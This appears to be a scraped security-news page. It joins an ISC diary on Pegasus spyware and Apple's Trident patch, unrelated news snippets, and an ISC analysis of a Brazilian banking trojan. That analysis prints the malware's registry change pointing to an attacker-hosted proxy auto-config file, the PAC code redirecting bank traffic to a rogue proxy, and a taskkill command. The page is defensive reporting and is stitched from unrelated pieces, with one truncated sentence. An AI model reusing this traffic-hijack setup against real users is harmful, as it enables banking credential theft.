(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A new spyware targeting iOS has been discovered. Called Pegasus [1], it is a sophisticated, targeted spyware developed by professionals: it chains 0-day vulnerabilities and relies on code obfuscation and encryption to stay hidden.

Apple today released an out-of-band update for iOS (version 9.3.5) [2]. It fixes three critical vulnerabilities, collectively known as "Trident":

CVE-2016-4655 (Memory Corruption in Safari WebKit)
A memory corruption vulnerability in WebKit allows an attacker to execute arbitrary code when the victim opens a malicious web page. Pegasus exploits it to obtain initial code execution within the context of the Safari browser process.

CVE-2016-4656 (Kernel Information Leak Circumvents KASLR)
Before Pegasus can jailbreak the device, it must determine where the kernel is located in memory. Kernel Address Space Layout Randomization (KASLR) makes this difficult by mapping the kernel at a different, unpredictable location on each boot. This bug leaks a kernel address, which lets Pegasus compute the kernel's actual base and defeat KASLR.

CVE-2016-4657 (Memory Corruption in Kernel Leads to Jailbreak)
The third vulnerability in the Trident chain is the one used to jailbreak the device. A kernel memory corruption bug is exploited on both the 32-bit and 64-bit kernels, although the exploit is implemented differently on each.

Check on the Apple website whether the update is available for your device and install it as soon as possible (the usual way: through iTunes, or Settings > General > Software Update on the device).


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

APPLE-SA-2016-08-25-1 iOS 9.3.5

[Image: iPhone spyware known as Pegasus intercepts confidential data. (credit: Lookout)]

Apple has patched three high-severity iOS vulnerabilities that are being actively exploited to infect iPhones so attackers can steal confidential messages from a large number of apps, including Gmail, Facebook, and WhatsApp, security researchers said Thursday.

The spyware has been dubbed Pegasus by researchers from mobile security provider Lookout; they believe it has been circulating in the wild for a significant amount of time. Working with researchers from University of Toronto-based Citizen Lab, they have determined that the spyware targeted a political dissident located in the United Arab Emirates and was launched by a US-owned company specializing in computer-based exploits. Based on the price of the attack kit, about $8 million for 300 licenses, the researchers believe it's being actively used against other iPhone users throughout the world.

"Pegasus is the most sophisticated attack we’ve seen on any endpoint because it takes advantage of how integrated mobile devices are in our lives and the combination of features only available on mobile—always connected (WiFi, 3G/4G), voice communications, camera, email, messaging, GPS, passwords, and contact lists," Lookout and Citizen Lab researchers wrote in a blog post. "It is modular to allow for customization and uses strong encryption to evade detection."




Just a few weeks after posting iOS 9.3.4 to fix a jailbreaking-related bug, Apple has released iOS 9.3.5 to all supported iPhones and iPads. The update provides an "important security update" and comes just a few weeks before the expected release of iOS 10, which is currently pretty far along in the developer/public beta process.

Update: Apple also tells us that these bugs were fixed in the latest versions of the iOS 10 public and developer betas, which were released last week.

Apple's security release notes say that three bugs have been fixed, two in the iOS kernel and one in WebKit. The bugs were discovered by Citizen Lab and Lookout, which said they were actively exploited to hijack the iPhone of a political dissident. Lookout collectively calls the three zero-day vulnerabilities "Trident," and says that they could allow a victim's personal data to be accessed after opening a link sent in a text message. Trident infects a user's phone "invisibly and silently, such that victims do not know they've been compromised." We'll have more information about the vulnerability in a forthcoming article.



Leslie Jones, the black comedian who starred in the recent all-female remake of Ghostbusters, has been forced to take her website down after hackers seemingly took control, posting racist abuse, personal information, and what were apparently nude pictures stolen from the actor's iCloud account.

Jones, 48, has been the target of sustained online attacks for months, much of it racist and sexist in nature.

On Wednesday, hackers escalated the situation by posting a picture of the dead gorilla Harambe onto her personal Tumblr site, as well as explicit photos, her phone number and Twitter password, and screen grabs of her driver's licence and passport, according to TMZ.


GAITHERSBURG, Md. -- The U.S. Commerce Department's National Institute of Standards and Technology (NIST) has awarded six pilot grants totaling more than $15 million to foster more secure access to online services provided by states and ...

Yesterday, I discovered a nice example of a targeted attack against a Brazilian bank. It started with an email sample like this:

This message was sent to a Brazilian citizen. Written in Portuguese, it translates approximately (with the help of Google) to: "Please find attached the pay slip for August 2016, which is due on Monday 29/08/2016...."

The picture is a link to a RAR file, visualizar_imprimir.rar (MD5: c2781a11e7de53cc0ddb2161628454cb), which contains a malicious PE file, visualizar_imprimir.exe [1]. Once executed, the malware sets the following registry value, which tells Internet Explorer (and any browser that uses the system proxy settings, such as Chrome) where to fetch its proxy configuration:

    \REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

Note: files 0.png to 9.png are all available on that server and have the same content.

This registry value forces the browser to fetch the file and apply the settings it contains. Indeed, 1.png is not an image but a proxy auto-config (PAC) file [2], a small piece of JavaScript that the browser calls for every URL to decide how to reach it:

    function FindProxyForURL(url, host) {
        var a = "PROXY <rogue proxy address>";   /* the address is given in [3] */
        if (shExpMatch(host, "www.san*ander.com.br*")) { return a; }
        if (shExpMatch(host, "san*ander.com.br*")) { return a; }
        return "DIRECT";
    }

The malware also kills any running Chrome instance, presumably so that the browser picks up the new proxy configuration when it is restarted:

    taskkill /F /IM chrome.exe

From now on, when the victim visits www.san*ander.com.br*, his/her browser forwards those requests to the rogue proxy server running on the address listed in [3]; all other URLs are fetched directly. I tested the proxy (a Squid/3.3.8) with other URLs and I always got a permission denied. Normal behavior or configuration error? I don

As this example shows, it is quite easy to hijack the traffic to specific websites. With this technique there is no need for a complex exploit or for breaking the encryption: just change the browser's proxy behavior and the attacker receives the victim's traffic to the targeted sites. One caveat a defender should keep in mind: for an HTTPS site the proxy only receives a CONNECT request for the bank's hostname, so to read or alter the session it must either present a certificate the victim's browser accepts or serve its own copy of the site. A certificate warning on a banking page is therefore a strong sign that something is wrong, and an unexpected AutoConfigURL value in the Internet Settings key is a cheap thing to check on any suspect Windows machine.

Stay safe!

[1] https://www.virustotal.com/en/file/cccbd8a8d485d386486cf790ada90415ac71ef7e637e7abcc4d39bf443d7b4fe/analysis/1472040570/
[2] https://en.wikipedia.org/wiki/Proxy_auto-config
[3] %%ip:

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

